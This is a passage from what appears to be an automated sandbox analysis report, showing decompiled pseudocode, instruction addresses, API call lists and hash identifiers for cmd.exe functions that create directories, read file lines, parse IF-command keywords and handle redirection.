								goto L43;
							}
							if(_t59 != 3) {
								goto L39;
							}
							if( *0x1213cc9 == 0) {
								L29:
								_push(_t105);
								_push(0x52);
								goto L40;
							}
							_t91 = _v28;
							_t67 = _t91;
							if(_t91 == 0) {
								_t67 =  &_v548;
							}
							_t100 = 0x5c;
							_t104 = 0x3a;
							_v560 = _t100;
							if(_t67[1] != _t104) {
								_t68 = _t91;
								if(_t91 == 0) {
									_t68 =  &_v548;
								}
								if( *_t68 != _t100) {
									goto L29;
								} else {
									_t69 = _t91;
									if(_t91 == 0) {
										_t69 =  &_v548;
									}
									if(_t69[1] != _t100) {
										goto L29;
									} else {
										_t101 = _t91;
										if(_t91 == 0) {
											_t101 =  &_v548;
										}
										_t100 =  &(_t101[2]);
										_v552 = _t100;
										_t104 = _t100;
										_t70 =  *_t100 & 0x0000ffff;
										if(_t70 == 0) {
											L59:
											if( *_t100 != _t105) {
												_t100 =  &(_t104[1]);
												_v552 = _t100;
												_t104 = _t100;
											}
											_t71 =  *_t100 & 0x0000ffff;
											if(_t71 == 0) {
												goto L30;
											}
											_v556 = _t71;
											_t88 = _t71;
											while(1) {
												_t73 = _t104;
												if(_t88 == _v560) {
													break;
												}
												_t100 =  &(_t104[1]);
												_v552 = _t100;
												_t104 = _t100;
												_t81 =  *_t100 & 0x0000ffff;
												_v556 = _t100;
												_t88 = _t81;
												if(_t81 != 0) {
													continue;
												}
												_t73 = _t100;
												break;
											}
											_t86 = 1;
											if( *_t100 == _t105) {
												goto L30;
											}
											_t100 =  &(_t73[1]);
											goto L19;
										}
										_t89 = _t100;
										_t97 = _t70;
										_t106 = 0x5c;
										while(1) {
											_t104 = _t89;
											if(_t97 == _t106) {
												break;
											}
											_t100 =  &(_t89[1]);
											_v552 = _t100;
											_t89 = _t100;
											_t82 =  *_t100 & 0x0000ffff;
											_t104 = _t100;
											_t97 = _t82;
											if(_t82 != 0) {
												continue;
											}
											break;
										}
										_t91 = _v28;
										_t86 = 1;
										_t105 = 0;
										goto L59;
									}
								}
							} else {
								_t103 = _t91;
								if(_t91 == 0) {
									_t103 =  &_v548;
								}
								_t100 =  &(_t103[3]);
								while(1) {
									L19:
									_v552 = _t100;
									while(1) {
										L20:
										_t104 =  *_t100 & 0x0000ffff;
										if(_t104 == 0) {
											break;
										} else {
											goto L21;
										}
										while(1) {
											L21:
											_t74 = 0x5c;
											if(_t104 == _t74) {
												break;
											}
											_t100 =  &(_t100[1]);
											_v552 = _t100;
											_t80 =  *_t100 & 0x0000ffff;
											_t104 = _t80;
											if(_t80 != 0) {
												continue;
											}
											_t104 = 0x5c;
											if( *_t100 != _t104) {
												goto L20;
											}
											L26:
											 *_t100 = 0;
											_t76 = _v28;
											if(_t76 == 0) {
												_t76 =  &_v548;
											}
											if(CreateDirectoryW(_t76, _t105) != 0 || GetLastError() == 0xb7) {
												 *_v552 = _t104;
												_t91 = _v28;
												_t100 =  &(_v552[1]);
												goto L19;
											} else {
												goto L29;
											}
										}
										_t104 = 0x5c;
										goto L26;
									}
									L30:
									if(_t91 == 0) {
										_t91 =  &_v548;
									}
									if(CreateDirectoryW(_t91, _t105) != 0) {
										goto L9;
									} else {
										_t59 = GetLastError();
										if(_t59 == 0xb7) {
											goto L9;
										} else {
											goto L39;
										}
									}
								}
							}
						}
						_t86 = _t105;
						goto L8;
					}
				}
				_t98 =  *_t104;
				if(E011E29BB( *_t104) == 0) {
					_push(0);
					_push(0xf);
					E011DC5A2(_t98);
					_t61 = 1;
					goto L10;
				}
				goto L2;
			}










































                                    0x011dbf30
                                    0x011dbf3b
                                    0x011dbf42
                                    0x011dbf48
                                    0x011dbf4d
                                    0x011dbf52
                                    0x011dbf64
                                    0x011dbf69
                                    0x011dbf6c
                                    0x011dbf77
                                    0x011dbf7b
                                    0x011dbf7d
                                    0x011dbf80
                                    0x011dbf87
                                    0x011dbfa9
                                    0x011ea3d6
                                    0x011ea3ea
                                    0x011ea3ea
                                    0x011ea3eb
                                    0x011ea3ec
                                    0x011ea3ec
                                    0x011dbfed
                                    0x011dbfed
                                    0x011dbfef
                                    0x011dbff2
                                    0x011dbff8
                                    0x011dbffa
                                    0x011dc00b
                                    0x011dc00b
                                    0x011dbfaf
                                    0x011dbfb4
                                    0x011ea3d9
                                    0x011ea3d9
                                    0x011dbfba
                                    0x011dbfc6
                                    0x011dbfce
                                    0x011ea3e4
                                    0x00000000
                                    0x011dbfd4
                                    0x011dbfd9
                                    0x011ea3f8
                                    0x011ea3f9
                                    0x011ea3fa
                                    0x011ea408
                                    0x011ea408
                                    0x00000000
                                    0x011ea40d
                                    0x011dbfe9
                                    0x011dc00e
                                    0x011dc019
                                    0x011ea401
                                    0x011ea402
                                    0x011ea403
                                    0x00000000
                                    0x011ea403
                                    0x011dc022
                                    0x00000000
                                    0x00000000
                                    0x011dc02f
                                    0x011dc0d7
                                    0x011dc0d7
                                    0x011dc0d8
                                    0x00000000
                                    0x011dc0d8
                                    0x011dc035
                                    0x011dc038
                                    0x011dc03c
                                    0x011ea415
                                    0x011ea415
                                    0x011dc044
                                    0x011dc047
                                    0x011dc048
                                    0x011dc052
                                    0x011ea42b
                                    0x011ea42f
                                    0x011ea431
                                    0x011ea431
                                    0x011ea43a
                                    0x00000000
                                    0x011ea440
                                    0x011ea440
                                    0x011ea444
                                    0x011ea446
                                    0x011ea446
                                    0x011ea450
                                    0x00000000
                                    0x011ea456
                                    0x011ea456
                                    0x011ea45a
                                    0x011ea45c
                                    0x011ea45c
                                    0x011ea462
                                    0x011ea465
                                    0x011ea46b
                                    0x011ea46d
                                    0x011ea473
                                    0x011ea4a2
                                    0x011ea4a5
                                    0x011ea4a7
                                    0x011ea4aa
                                    0x011ea4b0
                                    0x011ea4b0
                                    0x011ea4b2
                                    0x011ea4b8
                                    0x00000000
                                    0x00000000
                                    0x011ea4be
                                    0x011ea4c4
                                    0x011ea4c6
                                    0x011ea4c6
                                    0x011ea4cf
                                    0x00000000
                                    0x00000000
                                    0x011ea4d1
                                    0x011ea4d4
                                    0x011ea4da
                                    0x011ea4dc
                                    0x011ea4df
                                    0x011ea4e5
                                    0x011ea4ea
                                    0x00000000
                                    0x00000000
                                    0x011ea4ec
                                    0x00000000
                                    0x011ea4ec
                                    0x011ea4f0
                                    0x011ea4f4
                                    0x00000000
                                    0x00000000
                                    0x011ea4fa
                                    0x00000000
                                    0x011ea4fa
                                    0x011ea477
                                    0x011ea479
                                    0x011ea47b
                                    0x011ea47c
                                    0x011ea47c
                                    0x011ea481
                                    0x00000000
                                    0x00000000
                                    0x011ea483
                                    0x011ea486
                                    0x011ea48c
                                    0x011ea48e
                                    0x011ea491
                                    0x011ea493
                                    0x011ea498
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ea498
                                    0x011ea49a
                                    0x011ea49f
                                    0x011ea4a0
                                    0x00000000
                                    0x011ea4a0
                                    0x011ea450
                                    0x011dc058
                                    0x011dc058
                                    0x011dc05c
                                    0x011ea420
                                    0x011ea420
                                    0x011dc062
                                    0x011dc07c
                                    0x011dc07c
                                    0x011dc07c
                                    0x011dc082
                                    0x011dc082
                                    0x011dc082
                                    0x011dc088
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dc08a
                                    0x011dc08a
                                    0x011dc08c
                                    0x011dc090
                                    0x00000000
                                    0x00000000
                                    0x011dc092
                                    0x011dc095
                                    0x011dc09b
                                    0x011dc09e
                                    0x011dc0a3
                                    0x00000000
                                    0x00000000
                                    0x011dc0a7
                                    0x011dc0ab
                                    0x00000000
                                    0x00000000
                                    0x011dc0b2
                                    0x011dc0b4
                                    0x011dc0b7
                                    0x011dc0bc
                                    0x011dc0f8
                                    0x011dc0f8
                                    0x011dc0c8
                                    0x011dc06d
                                    0x011dc076
                                    0x011dc079
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dc0c8
                                    0x011dc0b1
                                    0x00000000
                                    0x011dc0b1
                                    0x011dc0df
                                    0x011dc0e1
                                    0x011dc100
                                    0x011dc100
                                    0x011dc0ed
                                    0x00000000
                                    0x011dc0f3
                                    0x011ea502
                                    0x011ea50d
                                    0x00000000
                                    0x011ea513
                                    0x00000000
                                    0x011ea513
                                    0x011ea50d
                                    0x011dc0ed
                                    0x011dc07c
                                    0x011dc052
                                    0x011dbfeb
                                    0x00000000
                                    0x011dbfeb
                                    0x011dbfce
                                    0x011dbf54
                                    0x011dbf5e
                                    0x011ea3c2
                                    0x011ea3c4
                                    0x011ea3c6
                                    0x011ea3ce
                                    0x00000000
                                    0x011ea3ce
                                    0x00000000

                                    APIs
                                    • memset.MSVCRT ref: 011DBF80
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 011DBFC6
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DBFE1
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DBFF2
                                      • Part of subcall function 011E29BB: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(011E0B22,011E0B22,00007FE7), ref: 011E29E9
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC00E
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DC0C0
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC0CA
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DC0E5
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011EA502
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                    • String ID:
                                    • API String ID: 402963468-0
                                    • Opcode ID: b70cf01f259ef184adec374738a7905b66bbb10c612044aac7d31b3976c0d51c
                                    • Instruction ID: 4d60beba817b71fff9d89e3844ca4d8c32e720c5dda63b5a15b768ccf64682b8
                                    • Opcode Fuzzy Hash: b70cf01f259ef184adec374738a7905b66bbb10c612044aac7d31b3976c0d51c
                                    • Instruction Fuzzy Hash: 74810835A006169BEB3CDF99E85CBBAB7F4EF49704F0584A9E606D7180E7708D80CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F396E, Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 45%
                                    			E011F396E(void* __ecx, short* __edx, long _a4, DWORD* _a8) {
				long _v8;
				char* _v12;
				long _v16;
				void* _v20;
				int _v24;
				short* _v28;
				int _t36;
				signed int _t38;
				int _t41;
				int _t52;
				void* _t54;
				char* _t55;
				int _t57;
				int _t58;
				void _t60;
				int _t62;
				void* _t65;
				DWORD* _t67;

				_t65 = __ecx;
				_v28 = __edx;
				_v20 = __ecx;
				_t54 = 0x11fd620;
				_v16 = SetFilePointer(__ecx, 0, 0, 1);
				if(_a4 >= 0x1fff) {
					_a4 = 0x1fff;
				}
				__imp__AcquireSRWLockShared(0x1217f20);
				_t36 = ReadFile(_t65, _t54, _a4, _a8, 0);
				__imp__ReleaseSRWLockShared(0x1217f20);
				if(_t36 != 0) {
					_t67 = _a8;
					_t62 =  *_t67;
					if(_t62 == 0) {
						goto L3;
					}
					_t57 = _t62;
					_v8 = _t62;
					if( *0x1203854 == 0xfde9 && _v16 == 0 && _a4 > 3) {
						_push(3);
						_push(0x11d3270);
						_push(_t54);
						L011E82C7();
						_t57 = _t62;
						if(_t36 == 0) {
							_t62 = _t62 + 0xfffffffd;
							_v16 = 3;
							_t54 = 0x11fd623;
							 *_t67 = _t62;
							_v8 = _t62;
							_t57 = _t62;
						}
					}
					_v12 = _t54;
					if(_t62 <= 0) {
						L21:
						_t55 = _v12;
						goto L22;
					} else {
						do {
							if(_t57 < 3) {
								L16:
								if( *((char*)(( *_t54 & 0x000000ff) + 0x1217f30)) == 0) {
									_t57 = _t57 - 1;
									goto L20;
								}
								if(_t57 == 1) {
									__imp__AcquireSRWLockShared(0x1217f20);
									_t28 = _t54 + 1; // 0x11fd621
									_t52 = ReadFile(_v20, _t28, 1,  &_v8, 0);
									__imp__ReleaseSRWLockShared(0x1217f20);
									if(_t52 == 0 || _v8 == 0) {
										 *_a8 =  *_a8 & 0x00000000;
										goto L3;
									} else {
										_t67 = _a8;
										_t62 = _t62 + 1;
										goto L21;
									}
								}
								_push(2);
								_t57 = _t57 + 0xfffffffe;
								_pop(1);
								goto L20;
							}
							_t60 =  *_t54;
							if(_t60 != 0xa ||  *(_t54 + 1) != 0xd) {
								_v24 = _t57;
								if(_t60 != 0xd ||  *(_t54 + 1) != 0xa) {
									goto L16;
								} else {
									goto L24;
								}
							} else {
								L24:
								 *((char*)(_t54 + 2)) = 0;
								_t55 = _v12;
								_t62 = _t54 - _t55 + 2;
								SetFilePointer(_v20, _v16 + _t62, 0, 0);
								L22:
								_t58 =  *0x1203854;
								_t38 = E011E0638(_t58);
								asm("sbb eax, eax");
								_t41 = MultiByteToWideChar(_t58,  ~( ~_t38), _t55, _t62, _v28, _a4);
								 *_t67 = _t41;
								return _t41;
							}
							L20:
							_t54 = _t54 + 1;
							_v8 = _t57;
						} while (_t57 > 0);
						goto L21;
					}
				} else {
					L3:
					return 0;
				}
			}





















                                    0x011f397d
                                    0x011f397f
                                    0x011f3985
                                    0x011f3988
                                    0x011f3993
                                    0x011f399e
                                    0x011f39a0
                                    0x011f39a0
                                    0x011f39a9
                                    0x011f39ba
                                    0x011f39c3
                                    0x011f39cb
                                    0x011f39d4
                                    0x011f39d7
                                    0x011f39db
                                    0x00000000
                                    0x00000000
                                    0x011f39e7
                                    0x011f39e9
                                    0x011f39ec
                                    0x011f39fa
                                    0x011f39fc
                                    0x011f3a01
                                    0x011f3a02
                                    0x011f3a0a
                                    0x011f3a0e
                                    0x011f3a10
                                    0x011f3a13
                                    0x011f3a1a
                                    0x011f3a1f
                                    0x011f3a21
                                    0x011f3a24
                                    0x011f3a24
                                    0x011f3a0e
                                    0x011f3a26
                                    0x011f3a2b
                                    0x011f3a75
                                    0x011f3a75
                                    0x00000000
                                    0x011f3a2d
                                    0x011f3a2d
                                    0x011f3a30
                                    0x011f3a4f
                                    0x011f3a59
                                    0x011f3a6a
                                    0x00000000
                                    0x011f3a6b
                                    0x011f3a5e
                                    0x011f3acb
                                    0x011f3ad9
                                    0x011f3ae0
                                    0x011f3aed
                                    0x011f3af5
                                    0x011f3b09
                                    0x00000000
                                    0x011f3afd
                                    0x011f3afd
                                    0x011f3b00
                                    0x00000000
                                    0x011f3b00
                                    0x011f3af5
                                    0x011f3a60
                                    0x011f3a62
                                    0x011f3a65
                                    0x00000000
                                    0x011f3a65
                                    0x011f3a32
                                    0x011f3a37
                                    0x011f3a3f
                                    0x011f3a47
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f3aa4
                                    0x011f3aa4
                                    0x011f3aa9
                                    0x011f3aac
                                    0x011f3ab5
                                    0x011f3abe
                                    0x011f3a78
                                    0x011f3a78
                                    0x011f3a7e
                                    0x011f3a8b
                                    0x011f3a93
                                    0x011f3a99
                                    0x00000000
                                    0x011f3a99
                                    0x011f3a6c
                                    0x011f3a6c
                                    0x011f3a6e
                                    0x011f3a71
                                    0x00000000
                                    0x011f3a2d
                                    0x011f39cd
                                    0x011f39cd
                                    0x00000000
                                    0x011f39cd

                                    APIs
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,0000000A,00000000,00000001,?,011F3B43,?,?,?,011F977C), ref: 011F398D
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F39A9
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011FD620,?,?,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F39BA
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F39C3
                                    • memcmp.MSVCRT ref: 011F3A02
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,01217F20,?,?,?,011F3B43,?,?,?,011F977C), ref: 011F3A93
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F3ABE
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F3ACB
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD621,00000001,011F977C,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F3AE0
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F3AED
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                    • String ID:
                                    • API String ID: 2002953238-0
                                    • Opcode ID: 53493e86bd9de619dd3d1388a24d48fc76c1e364cfe2fb9351ba471fa43fbdee
                                    • Instruction ID: 2a932ff4d00e50243cfc1cb7b4d9efb4e6b448031b20eb7c8a4e544b029da471
                                    • Opcode Fuzzy Hash: 53493e86bd9de619dd3d1388a24d48fc76c1e364cfe2fb9351ba471fa43fbdee
                                    • Instruction Fuzzy Hash: F451E472E20205AFDF29CF69D848BB9BBB9FF94710F04405DEA25DB280C7718984CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DCDA2, Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 32%
                                    			E011DCDA2(void* __ecx) {
				void* __ebp;
				void* _t2;
				signed int _t4;
				intOrPtr _t6;
				void* _t18;
				void* _t23;
				void* _t33;
				intOrPtr* _t36;

				_push(__ecx);
				_t33 = __ecx;
				_t2 = E011DF030(0);
				_t40 = _t2 - 0x4000;
				if(_t2 != 0x4000) {
					E011F82EB(0);
				}
				_t4 = E011DE9A0(0, _t40);
				_t36 = _t4;
				__imp___wcsicmp(L"ERRORLEVEL", 0x120faa0);
				_pop(_t18);
				if(_t4 == 0) {
					 *_t36 = 0x35;
					goto L14;
				} else {
					__imp___wcsicmp(L"EXIST", 0x120faa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x37;
						L14:
						_t6 = E011DEA40(E011DDDCD(_t18, _t18, 0), 0);
						L12:
						 *((intOrPtr*)(_t36 + 0x3c)) = _t6;
						L9:
						return _t36;
					}
					if( *0x1213cc9 == 0) {
						L7:
						__imp___wcsicmp(L"NOT", 0x120faa0);
						_pop(_t23);
						if(_t4 == 0) {
							__eflags = _t33;
							if(_t33 != 0) {
								E011F82EB(_t23);
							}
							 *_t36 = 0x38;
							__eflags = 1;
							_t6 = E011DCDA2(1);
							goto L12;
						}
						E011DF300(_t4, 0, 0, 0);
						 *_t36 = 0x39;
						E011D9520(_t36);
						goto L9;
					}
					__imp___wcsicmp(L"CMDEXTVERSION", 0x120faa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x34;
						goto L14;
					}
					if( *0x1213cc9 == 0) {
						goto L7;
					}
					__imp___wcsicmp(L"DEFINED", 0x120faa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x36;
						goto L14;
					}
					goto L7;
				}
			}











                                    0x011dcdaa
                                    0x011dcdae
                                    0x011dcdb2
                                    0x011dcdb7
                                    0x011dcdbc
                                    0x011eb3f9
                                    0x011eb3f9
                                    0x011dcdc4
                                    0x011dcdce
                                    0x011dcdd6
                                    0x011dcddd
                                    0x011dcde0
                                    0x011eb403
                                    0x00000000
                                    0x011dcde6
                                    0x011dcdec
                                    0x011dcdf3
                                    0x011dcdf6
                                    0x011dce9a
                                    0x011dce86
                                    0x011dce93
                                    0x011dce7b
                                    0x011dce7b
                                    0x011dce60
                                    0x011dce68
                                    0x011dce68
                                    0x011dce03
                                    0x011dce36
                                    0x011dce3c
                                    0x011dce43
                                    0x011dce46
                                    0x011dce69
                                    0x011dce6b
                                    0x011dcea2
                                    0x011dcea2
                                    0x011dce6f
                                    0x011dce75
                                    0x011dce76
                                    0x00000000
                                    0x011dce76
                                    0x011dce4e
                                    0x011dce55
                                    0x011dce5b
                                    0x00000000
                                    0x011dce5b
                                    0x011dce0b
                                    0x011dce12
                                    0x011dce15
                                    0x011eb40e
                                    0x00000000
                                    0x011eb40e
                                    0x011dce22
                                    0x00000000
                                    0x00000000
                                    0x011dce2a
                                    0x011dce31
                                    0x011dce34
                                    0x011dce80
                                    0x00000000
                                    0x011dce80
                                    0x00000000
                                    0x011dce34

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                    • API String ID: 2081463915-1668778490
                                    • Opcode ID: 4e631e91ebf9a9762baa4beb6c7aa15b5fdf1ced6c5ac39fbcdbcd7f4a6ddbd7
                                    • Instruction ID: c7bf34167b3254974b6e8411aea9e032114d969f92fb0106cb8cb3ad50d2847c
                                    • Opcode Fuzzy Hash: 4e631e91ebf9a9762baa4beb6c7aa15b5fdf1ced6c5ac39fbcdbcd7f4a6ddbd7
                                    • Instruction Fuzzy Hash: 08210BB16487139AFB3D5B7AA81972B7ECEDF541A4F14481FE143811C0EF759840C39A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DD97E, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E011DD97E(signed int* __ecx, signed int __edx) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				signed int _v552;
				signed int* _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int* _t68;
				signed int _t75;
				signed int _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t89;
				void* _t90;
				signed int _t92;
				void* _t93;
				WCHAR* _t95;
				WCHAR* _t103;
				WCHAR* _t110;
				void* _t116;
				signed int _t120;
				signed int _t123;
				void* _t128;
				signed int _t129;
				signed int _t130;
				void* _t133;
				signed int _t135;
				signed int _t136;
				signed int _t137;

				_t124 = __edx;
				_t56 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t56 ^ _t137;
				_t134 = 0x104;
				_v552 = __edx;
				_t95 = 0;
				_v24 = 1;
				_v28 = 0;
				_t129 = __ecx;
				_v20 = 0x104;
				_v556 = __ecx;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L33:
					_t95 = 1;
					L30:
					__imp__??_V@YAXPAX@Z();
					return E011E6FD0(_t95, _t95, _v8 ^ _t137, _t124, _t129, _t134, _v28);
				}
				_t135 =  *(_t129 + 0x34);
				if(_t135 == 0) {
					L11:
					_t134 = _v552;
					if(_t134 == 3) {
						_t68 =  *0x1213cd4;
						_v556 = _t68;
						L14:
						_t129 =  *(_t129 + 0x34);
						if(_t129 == 0) {
							goto L30;
						}
						_t134 = _t134 | 0xffffffff;
						do {
							if( *(_t129 + 8) != _t95) {
								goto L29;
							}
							__imp___get_osfhandle( *_t129);
							if(_t68 == _t134) {
								L39:
								 *(_t129 + 8) = _t134;
								L22:
								_t103 =  *(_t129 + 4);
								if( *_t103 == 0x26) {
									_t103[2] = 0;
									_t124 =  *_t129;
									_t105 = (( *(_t129 + 4))[1] & 0x0000ffff) - 0x30;
									if(E011DDBFC((( *(_t129 + 4))[1] & 0x0000ffff) - 0x30,  *_t129) != _t134) {
										goto L29;
									}
									L52:
									E011DD937();
									_t134 = 0x1213d00;
									E011E274C(0x1213d00, 0x104, L"%d",  *_t129);
									E011DC5A2(_t105, 0x2344, 1, 0x1213d00);
									goto L33;
								}
								_push(_t103);
								if( *((short*)(_t129 + 0x10)) == 0x3c) {
									_t124 = 0x8000;
									_t75 = E011DD120(_t103, 0x8000);
									_v552 = _t75;
									if(_t75 != _t134) {
										L26:
										if(_t75 !=  *_t129) {
											_t124 =  *_t129;
											_t76 = E011DDBFC(_t75,  *_t129);
											_t105 = _v552;
											_t136 = _t76;
											E011DDB92(_v552);
											if(_t136 == 0xffffffff) {
												goto L52;
											}
											_t75 =  *_t129;
											_t134 = _t136 | 0xffffffff;
										}
										if(_t75 == _t134) {
											L53:
											E011DD937();
											E011F985A( *0x1213cf0);
											goto L33;
										}
										_v556[1] = _t75;
										goto L29;
									}
									_t80 = E011E3320(L"DPATH");
									if(_t80 == 0) {
										goto L53;
									}
									_t110 = _v28;
									if(_t110 == 0) {
										_t110 =  &_v548;
									}
									if(SearchPathW(_t80,  *(_t129 + 4), _t95, _v20, _t110, _t95) == 0) {
										goto L53;
									} else {
										_t103 = _v28;
										if(_t103 == 0) {
											_t103 =  &_v548;
										}
										_push(_t103);
										_t124 = 0x8000;
										L25:
										_t75 = E011DD120(_t103, _t124);
										_v552 = _t75;
										if(_t75 == _t134) {
											goto L53;
										}
										goto L26;
									}
								}
								asm("sbb edx, edx");
								_t124 = ( ~( *(_t129 + 0xc)) & 0xfffffe09) + 0x301;
								goto L25;
							}
							__imp___get_osfhandle( *_t129);
							if(_t68 == 0xfffffffe) {
								goto L39;
							}
							if(E011E0178(_t68) == 0) {
								_t82 = E011F9953(_t82,  *_t129);
								if(_t82 != 0) {
									goto L20;
								}
								__imp___get_osfhandle( *_t129, _t95, _t95, 1);
								_pop(_t114);
								if(_t82 != _t134) {
									goto L20;
								}
								_t134 = 0x1213d00;
								E011E274C(0x1213d00, 0x104, L"%d",  *_t129);
								_push(0x1213d00);
								_push(1);
								_push(0x40002721);
								L51:
								E011DC5A2(_t114);
								 *(_t129 + 8) = _t95;
								E011DD937();
								goto L33;
							}
							L20:
							_t114 =  *_t129;
							_t83 = E011DDBCE(_t82,  *_t129);
							 *(_t129 + 8) = _t83;
							if(_t83 == _t134) {
								_t134 = 0x1213d00;
								E011E274C(0x1213d00, 0x104, L"%d",  *_t129);
								_push(0x1213d00);
								_push(1);
								_push(0x2344);
								goto L51;
							}
							E011DDB92( *_t129);
							goto L22;
							L29:
							_t68 =  *(_t129 + 0x14);
							_t129 = _t68;
						} while (_t68 != 0);
						goto L30;
					}
					_t116 = 0x10;
					_t68 = E011E00B0(_t116);
					_v556 = _t68;
					if(_t68 == 0) {
						goto L33;
					}
					_t68[3] =  *0x1213cd4;
					 *0x1213cd4 = _t68;
					_t68[2] = _t129;
					 *_t68 = _t134;
					goto L14;
				} else {
					goto L2;
				}
				do {
					L2:
					_t118 =  *(_t135 + 4);
					_t130 =  *(_t135 + 4);
					_t128 = _t130 + 2;
					do {
						_t89 =  *_t130;
						_t130 = _t130 + 2;
					} while (_t89 != _t95);
					_t90 = E011E22C0(_t95, _t118);
					_t124 = (_t130 - _t128 >> 1) + 1;
					E011E1040( *(_t135 + 4), (_t130 - _t128 >> 1) + 1, _t90);
					if( *((intOrPtr*)(_t135 + 8)) != _t95) {
						goto L9;
					}
					_t124 =  *(_t135 + 4);
					_t120 = _t124;
					_t133 = _t120 + 2;
					do {
						_t93 =  *_t120;
						_t120 = _t120 + 2;
					} while (_t93 != _t95);
					_t123 = (_t120 - _t133 >> 1) - 1;
					if(_t123 > 1 &&  *((short*)(_t124 + _t123 * 2)) == 0x3a) {
						 *((short*)(_t124 + _t123 * 2)) = 0;
					}
					L9:
					_t92 =  *(_t135 + 0x14);
					_t135 = _t92;
				} while (_t92 != 0);
				_t129 = _v556;
				goto L11;
			}




































                                    0x011dd97e
                                    0x011dd989
                                    0x011dd990
                                    0x011dd996
                                    0x011dd99b
                                    0x011dd9a1
                                    0x011dd9a3
                                    0x011dd9ae
                                    0x011dd9b1
                                    0x011dd9b3
                                    0x011dd9b8
                                    0x011dd9be
                                    0x011dd9e4
                                    0x011ddb8d
                                    0x011ddb8f
                                    0x011ddb50
                                    0x011ddb53
                                    0x011ddb6c
                                    0x011ddb6c
                                    0x011dd9ea
                                    0x011dd9ef
                                    0x011dda55
                                    0x011dda55
                                    0x011dda5e
                                    0x011eba31
                                    0x011eba36
                                    0x011dda8d
                                    0x011dda8d
                                    0x011dda92
                                    0x00000000
                                    0x00000000
                                    0x011dda98
                                    0x011dda9b
                                    0x011dda9e
